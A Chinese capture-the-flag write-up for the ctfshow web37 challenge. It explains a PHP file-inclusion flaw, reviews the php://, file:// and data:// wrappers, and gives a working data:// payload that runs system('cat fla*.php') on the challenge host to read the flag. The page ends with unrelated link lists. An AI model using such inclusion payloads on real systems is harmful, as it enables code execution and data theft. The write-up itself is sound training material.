ctfshow-web37

文章目录

  • ctfshow-web37
  • 题目描述:
  • 原理:
    • 审计:
  • 方法:
    • 思路:
      • 利用文件按包含漏洞,data协议
  • Flag:

题目描述:

原理:

审计:

 <?php/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:18:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*///flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){ //过滤了flaginclude($c);                //文件包含漏洞,包含变量cecho $flag;                //输出变量flag的内容}}else{highlight_file(__FILE__);
}

方法:

思路:

利用文件按包含漏洞,data协议

以为include()函数可以文件包含一个文件,并且可以执行该文件的内容(如果该文件有代码内容的话)
这个题是include包含的变量c,同样,可以利用文件包含漏洞,将c变量想办法变更成php代码,从而通过include函数执行。

协议:

php://协议
php:// 访问各个输入/输出流,在CTF中经常使用的是php://filter和php://input,php://filter用于读取源码,php://input用于执行

file://协议 用于访问本地文件系统,在CTF中通常用来读取本地文件

data://协议 通常可以用来执行PHP代码

payload:
http://31dfeb01-c218-4654-a73b-b762ec34a248.challenge.ctf.show/?c=data://text/plain,<?php system("cat fla*.php");?>
ls查看有什么文件,发现flag.php

cat flag.php
http://31dfeb01-c218-4654-a73b-b762ec34a248.challenge.ctf.show/?c=data://text/plain,<?php system("cat fla*.php");?>
得到flag

Flag:

ctfshow{f743851c-e2ec-4033-b3ed-356d7ac1863d}

ctfshow-命令执行-web37相关推荐

  1. CTFshow 命令执行 web37

    源码 <?php/* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified ...

  2. CTFshow——命令执行

    CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...

  3. [CTFSHOW]命令执行

    文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...

  4. CTFshow命令执行29-123

    命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...

  5. CTFshow 命令执行 web72

    目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...

  6. ctfshow命令执行(持续更新,已更至web39)

    做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...

  7. ctfshow 命令执行 web29-web77 web118-122 web124 wp

    南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...

  8. ctfshow命令执行篇

    web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...

  9. [CTFSHOW]命令执行55-74

    web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...

  10. ctfshow命令执行

    目录 web33:[文件包含] web34: web35: web36:多过滤了0-9的数字,用参数逃逸可以不用数字,用字母就可以成功绕过 ,步骤一样,略 web37: web38: web39: w ...

最新文章

  1. 机器学习调参自动优化方法
  2. Linux中TFTP使用详解
  3. 图解Windows下使用SSH Secure Shell Client远程连接Linux
  4. bootcmd 和bootargs
  5. Database2Sharp重要更新之完善EnterpriseLibrary架构代码
  6. html页面怎么添加打印,在网页中添加打印按钮或链接的方法
  7. mysql导入超大sql文件时mysql服务重启
  8. c ++基本数据类型_C ++中的数据类型
  9. javascript中insertRow(index) 和insertCell(index)
  10. HTML5游子吟网页的完整代码,游子吟
  11. matlab调用pspice结果,使PSpice输出数据文件可以导入到MATLAB中绘制图形.pdf
  12. android上查看浏览器内核版本号,各种浏览器的userAgent及如何使用JS来检测游览器类型,或android是什么版本号...
  13. [注]打动我的50句广告语
  14. BZOJ3097Hash Killer I
  15. 《信息安全系统设计基础》实验三 《实时系统的移植》 问题总结
  16. ES6_1.块级作用域绑定_临时死区TDZ
  17. 新出炉的 100+ 篇技术热文,在微信热传,别错过哦
  18. ieee 754 java_IEEE 754到十进制
  19. 关于oracle中ora-00600的报错
  20. 可口可乐市场调查失败的原因_经典案例5:可口可乐:一次市场调研失败的教训...

热门文章

  1. 遗传算法求解香蕉函数的极大值
  2. Idea使用Alibaba Cloud Toolkit
  3. AWS KVS(Kinesis Video Streams)之WebRTC
  4. Linux下使用AppImageLauncher安装AppImage文件
  5. Java 【打印俄文的英文字母】
  6. arcgis风向_arcgis趋势分析
  7. 在群晖NAS上搭建 Git Server
  8. 用PS制作动态雪景的教程
  9. 计算当前日期是一年中第几周
  10. 阿里云函数计算快速入门